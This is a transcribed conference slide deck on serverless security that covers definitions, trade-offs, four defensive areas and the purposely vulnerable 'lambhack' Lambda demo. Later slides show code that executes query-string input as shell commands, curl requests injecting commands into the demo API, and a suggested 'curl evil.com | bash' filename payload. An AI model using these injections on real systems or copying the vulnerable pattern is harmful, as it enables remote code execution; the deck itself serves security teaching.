Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Serverless Security: A pragmatic primer for builders and defenders

24,325 views

Published on

Talk given at O'Reilly's 2017 Velocity Conference in San Jose.

Serverless is the design pattern for writing applications at scale without the necessity of managing infrastructure. This is done across the continuum of the cloud—from storage as a service to database as a service—but the center of serverless is functions as a service (FaaS). (Current FaaS offerings include AWS Lambda, Azure Functions, and Google Cloud Functions.) Now processes run for milliseconds before being destroyed and then get instantiated for subsequent requests.

Serverless adds simplicity and a new economic model to cloud computing, but it creates some unique security challenges. In serverless architectures, technologies like antivirus and intrusion detection become meaningless. James Wickett explores practical security approaches for serverless in four key areas—the software supply chain, the delivery pipeline, data flow, and attack detection—and examines how traditional approaches need to be adapted to serverless.

Even if you don’t have any experience with serverless, don’t worry; this session starts with the basics. You’ll learn what serverless is (hint: it’s still being defined) and practical patterns for serverless adoption.

Published in: Software
  • Login to see the comments

Serverless Security: A pragmatic primer for builders and defenders

  1. 1. Velocity San Jose 2017 @WICKETT SERVERLESS SECURITY: A PRAGMATIC PRIMER FOR BUILDERS AND DEFENDERS JAMES WICKETT
  2. 2. Velocity San Jose 2017 @WICKETT WANT THE SLIDES RIGHT NOW? Send an email to 
 james@signalsciences.com
  3. 3. Velocity San Jose 2017 @WICKETT ‣ DEVOPS DAYS AUSTIN ORGANIZER ‣ HEAD OF RESEARCH AT SIGNAL SCIENCES ‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM ‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM JAMES WICKETT
  4. 4. Velocity San Jose 2017 @WICKETT Don’t worry, this is not a thinly veiled vendor pitch.
  5. 5. Velocity San Jose 2017 @WICKETT ‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION. ‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING ‣ SECURITY WITH SERVERLESS IS EASIER ‣ SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF 2)
  6. 6. Velocity San Jose 2017 @WICKETT ‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY ‣ SOFTWARE SUPPLY CHAIN SECURITY ‣ DELIVERY PIPELINE SECURITY ‣ DATA FLOW SECURITY ‣ ATTACK DETECTION ‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT ‣ GITHUB.COM/WICKETT/LAMBHACK CONCLUSION (2 OF 2)
  7. 7. Velocity San Jose 2017 @WICKETT WHAT IS SERVERLESS?
  8. 8. Velocity San Jose 2017 @WICKETT MISCONCEPTIONS
  9. 9. Velocity San Jose 2017 @WICKETT IT’S MARKETING (CLOUD REBRANDED)
  10. 10. Velocity San Jose 2017 @WICKETT SERVERLESS == NO SERVERS
  11. 11. Velocity San Jose 2017 @WICKETT SERVERLESS == BACKEND AS A SERVICE
  12. 12. Velocity San Jose 2017 @WICKETT SERVERLESS == PLATFORM AS A SERVICE
  13. 13. Velocity San Jose 2017 @WICKETT TK: ADRIANCO QUOTE
  14. 14. Velocity San Jose 2017 @WICKETT SO, WHAT IS SERVERLESS?
  15. 15. Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html @MIKEBROBERTS
  16. 16. Velocity San Jose 2017 @WICKETT
  17. 17. Velocity San Jose 2017 @WICKETT ‣ 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES ‣ LATE 2014 - AWS LAUNCHED LAMBDA ‣ JULY 2015 - AWS LAUNCHED API GATEWAY ‣ OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA ‣ 2015 TO PRESENT - FRAMEWORKS FORMING ‣ 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED ‣ 2016 - SERVERLESS CONFERENCES STARTED HISTORY OF SERVERLESS
  18. 18. Velocity San Jose 2017 @WICKETT VMsHardware Serverless Inspiration from @adrianco Waste Value
  19. 19. Velocity San Jose 2017 @WICKETT Decomposed Microservice Architecture
  20. 20. Velocity San Jose 2017 @WICKETT WHAT CAN WE SAY IS SERVERLESS?
  21. 21. Velocity San Jose 2017 @WICKETT SERVERLESS IS FUNCTIONS AS A SERVICE (FaaS)
  22. 22. Velocity San Jose 2017 @WICKETT CONTAINERS ON DEMAND
  23. 23. Velocity San Jose 2017 @WICKETT SERVERLESS IS (NO MANAGEMENT OF) SERVERS
  24. 24. Velocity San Jose 2017 @WICKETT SERVERLESS IS SERVICEFULL
  25. 25. Velocity San Jose 2017 @WICKETT SERVERLESS IS AN OPINIONATED FRAMEWORK FOR COMPUTE AND CONTAINERS
  26. 26. Velocity San Jose 2017 @WICKETT If you want to lead your company bravely into the new world, you would do well to focus lot on how serverless will evolve. - @Cloudopinion https://medium.com/ @cloud_opinion/the-pattern- may-repeat-26de1e8b489d
  27. 27. Velocity San Jose 2017 @WICKETT THE CLOUD WAS TO VIRTUALIZATION AS SERVERLESS WILL BE TO CONTAINERS
  28. 28. Velocity San Jose 2017 @WICKETT Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. SERVERLESS DEFINITION
  29. 29. Velocity San Jose 2017 @WICKETT SO, WHAT ARE THE UPSIDES?
  30. 30. Velocity San Jose 2017 @WICKETT SCALING BUILT IN
  31. 31. Velocity San Jose 2017 @WICKETT PAY FOR WHAT YOU USE IN 100MS INCREMENTS
  32. 32. Velocity San Jose 2017 @WICKETT WITH SERVERLESS SYSTEM ADMINISTRATION IS (MOSTLY) LOWER
  33. 33. Velocity San Jose 2017 @WICKETT SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE RUNTIME CLOSER TO DEVS
  34. 34. Velocity San Jose 2017 @WICKETT YOU CAN SKIP DOCKERING ALL THE THINGS!
  35. 35. Velocity San Jose 2017 @WICKETT GREAT, WHAT’S THE CATCH?
  36. 36. Velocity San Jose 2017 @WICKETT Ops burden to rationalize serverless model @patrickdebois
  37. 37. Velocity San Jose 2017 @WICKETT
  38. 38. Velocity San Jose 2017 @WICKETT VENDOR LOCK-IN
  39. 39. Velocity San Jose 2017 @WICKETT MONITORING
  40. 40. Velocity San Jose 2017 @WICKETT LOGGING
  41. 41. Velocity San Jose 2017 @WICKETT RELIABILITY
  42. 42. Velocity San Jose 2017 @WICKETT ‣ APP NEEDS LARGE LOCAL DISK SPACE ‣ LONG RUNNING JOBS ‣ BIG I/O TASKS ‣ LATENCY SENSITIVE REQUESTS THAT CAN’T WAIT FOR THE COLD-STARTUP TIME SERVERLESS DEAL KILLERS (PROBABLY)
  43. 43. Velocity San Jose 2017 @WICKETT SERVERLESS USE CASES
  44. 44. Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html MESSAGE PROCESSING
  45. 45. Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html API GATEWAY
  46. 46. Velocity San Jose 2017 @WICKETT WEB APPLICATIONS
  47. 47. Velocity San Jose 2017 @WICKETT CI/CD auth wordpress scraper event ingestion chatbots load testing MORE SERVERLESS USE CASES
  48. 48. Velocity San Jose 2017 @WICKETT Security
  49. 49. Velocity San Jose 2017 @WICKETT LETS TRY A SAMPLE APPLICATION IN AWS
  50. 50. Velocity San Jose 2017 @WICKETT ‣ SERVERLESS ‣ APEX ‣ GO SPARTA ‣ KAPPA STEP 1: PICK A FRAMEWORK
  51. 51. Velocity San Jose 2017 @WICKETT
  52. 52. Velocity San Jose 2017 @WICKETT ‣ GOLANG! ‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY ‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM ‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES GO SPARTA
  53. 53. Velocity San Jose 2017 @WICKETT ‣ CLOUDWATCH EVENTS AND LOGS ‣ DYNAMODB, KINESIS, ‣ S3 ‣ SES, SNS ‣ API GATEWAY CREATION GO SPARTA INCLUDES
  54. 54. Velocity San Jose 2017 @WICKETT ‣ BUILD A WORD CLOUD GENERATOR ‣ ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES ‣ RETURN JSON WITH COUNTS OF WORDS IN TEXT ‣ KEEP IT SIMPLE STEP 2: IDEA!
  55. 55. Velocity San Jose 2017 @WICKETT ‣ (USING GO SPARTA FOR THE FRAMEWORK) ‣ LAMBDA ‣ S3 ‣ API GATEWAY STEP 3: DESIGN AND ARCHITECTURE
  56. 56. Velocity San Jose 2017 @WICKETT
  57. 57. Velocity San Jose 2017 @WICKETT STEP 4: WRITE THE HANDLER
  58. 58. Velocity San Jose 2017 @WICKETT STEP 5: SETUP API GATEWAY
  59. 59. Velocity San Jose 2017 @WICKETT STEP 6: SET THE CONFIG DETAILS
  60. 60. Velocity San Jose 2017 @WICKETT STEP 7: PROVISION YOUR APP!
  61. 61. Velocity San Jose 2017 @WICKETT STEP 8: SETUP STRICT IAM POLICIES
  62. 62. Velocity San Jose 2017 @WICKETT STEP 9: GIVE UP AND SET LOOSE IAM POLICIES, PROMISE TO FIX LATER
  63. 63. Velocity San Jose 2017 @WICKETT STEP 10: PROVISION YOUR APP!
  64. 64. Velocity San Jose 2017 @WICKETT APP IN AWS CONSOLE
  65. 65. Velocity San Jose 2017 @WICKETT TEST LAMBDA EXEC IN CONSOLE FIRST RUN OF 343MS
  66. 66. Velocity San Jose 2017 @WICKETT SECOND RUN ONLY TOOK 84MS
  67. 67. Velocity San Jose 2017 @WICKETT API GATEWAY IN CONSOLE
  68. 68. Velocity San Jose 2017 @WICKETT API GATEWAY EXECUTION IN CONSOLE
  69. 69. Velocity San Jose 2017 @WICKETT RETURNED JSON
  70. 70. Velocity San Jose 2017 @WICKETT MONITORING LAMBDA IN CONSOLE
  71. 71. Velocity San Jose 2017 @WICKETT WHAT I LEARNED ABOUT SERVERLESS SECURITY
  72. 72. Velocity San Jose 2017 @WICKETT SECURITY
  73. 73. Velocity San Jose 2017 @WICKETT
  74. 74. Velocity San Jose 2017 @WICKETT ‣ SECURE SOFTWARE SUPPLY CHAIN ‣ DELIVERY PIPELINE ‣ DATA FLOW SECURITY ‣ ATTACK DETECTION FOUR AREAS OF SERVERLESS SECURITY
  75. 75. Velocity San Jose 2017 @WICKETT source: @devsecops
  76. 76. Velocity San Jose 2017 @WICKETT ‣ THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW ‣ CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED) OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO INHERITANCE SURFACE AREA REDUCTION
  77. 77. Velocity San Jose 2017 @WICKETT ‣ TLS CONTROL TO THE PROVIDER ‣ ROUTING CONTROL TO THE PROVIDER ‣ CONSUMPTION OF THIRD PARTY SERVICES ‣ IAM ROLES AND POLICY CONFUSION SURFACE AREA EXPANSION
  78. 78. Velocity San Jose 2017 @WICKETT SSL / TLS FROM THE PROVIDER
  79. 79. Velocity San Jose 2017 @WICKETT OLD WAY NEW WAY
  80. 80. Velocity San Jose 2017 @WICKETT ROUTING FROM THE PROVIDER
  81. 81. Velocity San Jose 2017 @WICKETT ROUTING THE OLD WAY
  82. 82. Velocity San Jose 2017 @WICKETT ROUTING THE NEW WAY
  83. 83. Velocity San Jose 2017 @WICKETT Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0 SERVICE AND 3RD PARTY EXPANSION
  84. 84. Velocity San Jose 2017 @WICKETT https://media.ccc.de/v/33c3-7865- gone_in_60_milliseconds IAM ROLES AND POLICIES
  85. 85. Velocity San Jose 2017 @WICKETT Recommendation: Use a third-party service to monitor for provider config changes
  86. 86. Velocity San Jose 2017 @WICKETT ‣ DISABLE ROOT ACCESS KEYS ‣ MANAGE USERS WITH PROFILES ‣ SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM ‣ SECURE KEYS IN DEV SYSTEM ‣ USE PROVIDER MFA USE GOOD HYGIENE WITH YOUR PROVIDER
  87. 87. Velocity San Jose 2017 @WICKETT DELIVERY PIPELINE SECURITY
  88. 88. Velocity San Jose 2017 @WICKETT
  89. 89. Velocity San Jose 2017 @WICKETT UNIT TESTING
  90. 90. Velocity San Jose 2017 @WICKETT EASIER TO MOCK HARDER TO MOCK
  91. 91. Velocity San Jose 2017 @WICKETT UNIT TESTING EVEN MORE CRITICAL AS INTEGRATION TESTING IN DEV IS HARDER
  92. 92. Velocity San Jose 2017 @WICKETT ‣ USE OF A STAGING OR PRE-PROD ENV ‣ END TO END SYNTHETIC INTEGRATION TESTS ‣ ALL THE USUAL SUSPECTS INTEGRATION TESTING
  93. 93. Velocity San Jose 2017 @WICKETT CONFIGURATION IS PART OF DELIVERY
  94. 94. Velocity San Jose 2017 @WICKETT ‣ ONLY DEV KEYS CAN PUSH TO ‘DEV’ ‣ ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE- PROD ‣ INTEGRATION TESTS MUST PASS IN THIS ENV ‣ SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION ‣ ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM GOOD PIPELINE PRACTICES
  95. 95. Velocity San Jose 2017 @WICKETT ‣ BDD-SECURITY - GITHUB.COM/ CONTINUUMSECURITY/BDD-SECURITY ‣ GAUNTLT - GAUNTLT.ORG ‣ GITHUB.COM/GAUNTLT/GAUNTLT ‣ DOCKER RECOMMENDED SECURITY TESTING TOOLS
  96. 96. Velocity San Jose 2017 @WICKETT http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015 GAUNTLT WORKSHOP IN 9 EXAMPLES
  97. 97. Velocity San Jose 2017 @WICKETT DATA FLOW ‣ DEVELOPMENT ‣ DATA FLOW DIAGRAMS ‣ THREAT MODELING ‣ RUNTIME ‣ LOGGING ‣ CUSTOM MONITORS/ METRICS
  98. 98. Velocity San Jose 2017 @WICKETT Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner. https://read.acloud.guru/adopting- serverless-architectures-and- security-254a0c12b54a
  99. 99. Velocity San Jose 2017 @WICKETT ‣ SPOOFING CONSUMED RESOURCES ‣ DENIAL OF SERVICE ‣ TIMEOUTS ‣ EXECUTION RESTRICTIONS FOR RESOURCES ‣ CAPACITY ISSUES DATA FLOW SECURITY
  100. 100. Velocity San Jose 2017 @WICKETT ATTACK DETECTION
  101. 101. Velocity San Jose 2017 @WICKETT DOES APPLICATION SECURITY STILL MATTER?
  102. 102. Velocity San Jose 2017 @WICKETT https://medium.com/ @PaulDJohnston/security-and- serverless-ec52817385c4
  103. 103. Velocity San Jose 2017 @WICKETT
  104. 104. Velocity San Jose 2017 @WICKETT APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL RELEVANT 15 YEARS LATER!
  105. 105. Velocity San Jose 2017 @WICKETT ‣ SERVERLESS HAS A FALSE SENSE OF SECURITY ‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;) ‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS ‣ A VULNERABLE LAMBDA + API GATEWAY STACK ‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS… INTRODUCING LAMBHACK
  106. 106. Velocity San Jose 2017 @WICKETT ‣ A VULNERABLE LAMBDA + API GATEWAY STACK ‣ OPEN SOURCE, MIT LICENSED ‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING ‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP ‣ GITHUB.COM/WICKETT/LAMBHACK github.com/wickett/lamback
  107. 107. Velocity San Jose 2017 @WICKETT lambhack is a vulnerable serverless lambda application It would certainly be a bad idea to base any coding patterns off what you see here.
  108. 108. Velocity San Jose 2017 @WICKETT
  109. 109. Velocity San Jose 2017 @WICKETT BAD CODE IS BAD CODE
 EVEN IN SERVERLESS… command := lambdaEvent.QueryParams[“args"] output := runner.Run(command)
  110. 110. Velocity San Jose 2017 @WICKETT With command execution available to us in lambhack, we can poke around the container a bit
  111. 111. Velocity San Jose 2017 @WICKETT UNAME -A $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=uname+-a; +sleep+1" > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  112. 112. Velocity San Jose 2017 @WICKETT CAT /PROC/VERSION $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/ version;+sleep+1” > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
  113. 113. Velocity San Jose 2017 @WICKETT LET’S LOOK IN /TMP $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp; +sleep+1" total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
  114. 114. Velocity San Jose 2017 @WICKETT LAMBDA REUSE IN ACTION! $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=ls+/tmp;+sleep+1" $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1” $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ prod/lambhack/args=ls+/tmp;+sleep+1" > Sparta.lambda.amd64 wickettfile
  115. 115. Velocity San Jose 2017 @WICKETT WHICH CURL $ curl “https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c? args=which+curl;+sleep+1" > /usr/bin/curl
  116. 116. Velocity San Jose 2017 @WICKETT ‣ ADD XSS ‣ ADD OTHER INJECTION ATTACKS ‣ ADD AUTH VECTORS ‣ … ‣ PULL REQUESTS ACCEPTED :) FUTURE OF LAMBHACK
  117. 117. Velocity San Jose 2017 @WICKETT ‣ LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO ‣ MONITORING/LOGGING PLAYS A KEY ROLE HERE ‣ DETECT LONGER RUN TIMES ‣ HIGHER ERROR RATE OCCURRENCES ‣ DATA INGESTION ‣ LOG ACTIONS OF LAMBDAS APPSEC THOUGHTS
  118. 118. Velocity San Jose 2017 @WICKETT APPLICATION SECURITY IS STILL RELEVANT
  119. 119. Velocity San Jose 2017 @WICKETT ‣ New surface area, similar appsec problems ‣ Command Exec ‣ XSS ‣ Injection Attacks ‣ Try new things, e.g. appending ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3 TYPES OF ATTACKS
  120. 120. Velocity San Jose 2017 @WICKETT ‣ LOGGING, EMITTING EVENTS ‣ USAGE METRICS ‣ VANDIUM (SQLI) WRAPPER ‣ CONTENT SECURITY POLICY (CSP) ‣ MORE THINGS NEED TO BE DONE HERE… DEFENSE
  121. 121. Velocity San Jose 2017 @WICKETT Development in serverless is easier than ever, attracting new developers to web development, as a result, application security will see a rise. FINAL THOUGHT
  122. 122. Velocity San Jose 2017 @WICKETT
  123. 123. Velocity San Jose 2017 @WICKETT ‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION. ‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING ‣ SECURITY WITH SERVERLESS IS EASIER ‣ SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF 2)
  124. 124. Velocity San Jose 2017 @WICKETT ‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY ‣ SOFTWARE SUPPLY CHAIN SECURITY ‣ DELIVERY PIPELINE SECURITY ‣ DATA FLOW SECURITY ‣ ATTACK DETECTION ‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT ‣ GITHUB.COM/WICKETT/LAMBHACK CONCLUSION (2 OF 2)
  125. 125. Velocity San Jose 2017 @WICKETT WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS? Send an email to 
 james@signalsciences.com

×